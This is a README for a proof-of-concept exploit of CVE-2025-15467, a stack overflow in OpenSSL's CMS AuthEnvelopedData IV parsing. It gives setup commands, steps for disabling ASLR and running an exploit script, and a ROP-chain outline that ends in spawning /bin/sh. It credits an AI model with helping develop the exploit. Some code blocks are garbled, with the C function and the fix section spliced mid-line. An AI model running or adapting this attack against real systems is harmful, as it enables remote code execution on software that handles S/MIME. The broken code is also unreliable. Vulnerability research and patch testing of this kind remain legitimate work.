Share
## https://sploitus.com/exploit?id=DC89798F-94F6-5209-AA65-80DBD702F3C6
# CVE-2025-15467: OpenSSL CMS AuthEnvelopedData Stack Buffer Overflow

## Overview

**CVE-2025-15467** is a critical stack buffer overflow vulnerability in OpenSSL's CMS (Cryptographic Message Syntax) parsing code. The vulnerability exists in the `evp_cipher_get_asn1_aead_params()` function when processing AES-GCM initialization vectors (IVs) in CMS AuthEnvelopedData structures.

| Property | Value |
|----------|-------|
| **CVE ID** | CVE-2025-15467 |
| **Severity** | High |
| **CVSS** | 8.1+ |
| **Affected Versions** | OpenSSL 3.0 - 3.6 (before patches) |
| **Impact** | Remote Code Execution (RCE) |
| **Attack Vector** | Network (parsing malicious CMS/S-MIME) |
| **Authentication** | None required |

## Vulnerability Details

### Root Cause

The vulnerability is located in `crypto/evp/evp_lib.c`:

```c
int evp_cipher_get_asn1_aead_params(EVP_CIPHER_CTX *c, ASN1_TYPE *type,
                                    evp_cipher_aead_asn1_params *asn1_params)
{
    int i = 0;
    long tl;
    unsigned char iv[EVP_MAX_IV_LENGTH];  // Fixed 16-byte buffer!

    if (type == NULL || asn1_params == NULL)
        return 0;

    i = ossl_asn1_type_get_octetstring_int(type, &tl, NULL, EVP_MAX_IV_LENGTH);
    if (i iv, iv, i);
    asn1_params->iv_len = i;

    return i;
}
```

### The Bug

1. `iv` is a fixed 16-byte stack buffer (`EVP_MAX_IV_LENGTH = 16`)
2. First call to `ossl_asn1_type_get_octetstring_int()` returns the IV length from the file
3. Second call uses this length (`i`) as `max_len` parameter
4. If `i > 16`, the function writes beyond the buffer โ†’ **Stack Buffer Overflow**

### Exploitation

The overflow occurs during CMS decryption when parsing the GCM parameters. An attacker can:

1. Craft a malicious CMS AuthEnvelopedData file with oversized IV
2. Overflow the stack buffer to overwrite return address
3. Redirect execution to attacker-controlled shellcode
4. Achieve Remote Code Execution

## Affected Applications

Any application that parses untrusted CMS/PKCS#7 content with AEAD ciphers:

- **Email clients** processing S/MIME messages
- **Document signing** applications
- **Certificate management** tools
- **VPN/TLS** implementations using CMS
- **Any software** calling `CMS_decrypt()` or similar functions

## Proof of Concept

### Prerequisites

```bash
# Install dependencies
pip install pwntools  # Optional, for auto gadget detection

# Clone this repository
git clone https://github.com/guiimoraes/CVE-2025-15467.git
cd CVE-2025-15467

# Run setup script to compile vulnerable OpenSSL
chmod +x setup.sh
./setup.sh
```

Or manually:

```bash
# Download and compile vulnerable OpenSSL 3.4.0
wget https://www.openssl.org/source/openssl-3.4.0.tar.gz
tar -xzf openssl-3.4.0.tar.gz
cd openssl-3.4.0

# Compile WITHOUT stack protector for easier demonstration
./Configure linux-x86_64 \
    --prefix=/opt/openssl-vuln \
    -fno-stack-protector \
    -D_FORTIFY_SOURCE=0 \
    -z execstack

make -j$(nproc)
sudo make install
cd ..
```

### Generate Test Certificate

```bash
export LD_LIBRARY_PATH=/opt/openssl-vuln/lib64

# Generate key and certificate
/opt/openssl-vuln/bin/openssl genrsa -out dummy.key 2048
/opt/openssl-vuln/bin/openssl req -new -x509 -key dummy.key -out dummy.crt \
    -days 1 -subj "/CN=Test"

# Create valid CMS file (needed as template)
echo "test" > plain.txt
/opt/openssl-vuln/bin/openssl cms -encrypt -aes-256-gcm \
    -in plain.txt -out valid.cms -outform DER dummy.crt

# Verify it works
/opt/openssl-vuln/bin/openssl cms -decrypt -in valid.cms -inform DER \
    -inkey dummy.key -recip dummy.crt
```

### Method 1: Auto Mode (Recommended)

The exploit can automatically detect addresses when ASLR is disabled:

```bash
# Disable ASLR (requires root)
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

# Run exploit with auto-detection
LD_LIBRARY_PATH=/opt/openssl-vuln/lib64 python3 exploit.py --auto \
    /opt/openssl-vuln/bin/openssl valid.cms dummy.key dummy.crt

# Execute the exploit
LD_LIBRARY_PATH=/opt/openssl-vuln/lib64 /opt/openssl-vuln/bin/openssl \
    cms -decrypt -in exploit.cms -inform DER -inkey dummy.key -recip dummy.crt

# You should get a shell!
```

### Method 2: Manual Addresses (via GDB)

If auto-detection fails, obtain addresses manually:

```bash
# Get addresses from GDB
LD_LIBRARY_PATH=/opt/openssl-vuln/lib64 gdb -q /opt/openssl-vuln/bin/openssl

(gdb) break main
(gdb) run cms -decrypt -in valid.cms -inform DER -inkey dummy.key -recip dummy.crt
(gdb) info proc mappings   # Get libc and libcrypto base addresses
(gdb) continue
(gdb) # When it hits evp_cipher_get_asn1_aead_params:
(gdb) print/x $rsp         # Get stack address
```

Example output:
```
libc-2.31.so:     0x7ffff7711000
libcrypto.so.3:   0x7ffff7936000
RSP:              0x7fffffffdc58
```

Then generate the exploit:

```bash
# Generate exploit with manual addresses
# Arguments:    [valid.cms]
python3 exploit.py 0x7ffff7936000 0x7ffff7711000 0x7fffffffdc58 valid.cms

# Run exploit
LD_LIBRARY_PATH=/opt/openssl-vuln/lib64 /opt/openssl-vuln/bin/openssl \
    cms -decrypt -in exploit.cms -inform DER -inkey dummy.key -recip dummy.crt
```

## How the Exploit Works

1. **Patch Valid CMS**: Takes a valid CMS file and replaces the 12-byte IV with a malicious payload
2. **Overflow Stack**: The oversized IV overflows the 16-byte buffer, overwriting saved registers and return address
3. **ROP Chain**: Uses Return-Oriented Programming to call `mprotect()` and make the stack executable
4. **Shellcode Execution**: After `mprotect()`, jumps to shellcode on the stack via `jmp rsp` gadget
5. **Shell**: Executes `execve("/bin/sh", NULL, NULL)` to spawn a shell

### ROP Chain Structure

```
[padding: 56 bytes to reach saved RIP]
[pop rdi; ret]         EVP_MAX_IV_LENGTH)
    return -1;
```

2. Use the correct max_len in the second call:
```c
ossl_asn1_type_get_octetstring_int(type, &tl, iv, EVP_MAX_IV_LENGTH);
```

## Timeline

| Date | Event |
|------|-------|
| 2025-12-14 | Vulnerability reported to OpenSSL |
| 2026-01-27 | Security advisory published |
| 2026-01-27 | Patches released |

## References

- [OpenSSL Security Advisory](https://www.openssl.org/news/secadv/20260127.txt)
- [CVE-2025-15467](https://vulners.com/cve/CVE-2025-15467)

## Credits

- **Guilherme Moraes** ([@guiimoraes](https://github.com/guiimoraes)) - Exploit Development
- **Claude Opus 4.5** (Anthropic) - AI-Assisted Research & Development

## Disclaimer

This proof of concept is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Use responsibly.

## License

MIT License - See LICENSE file for details.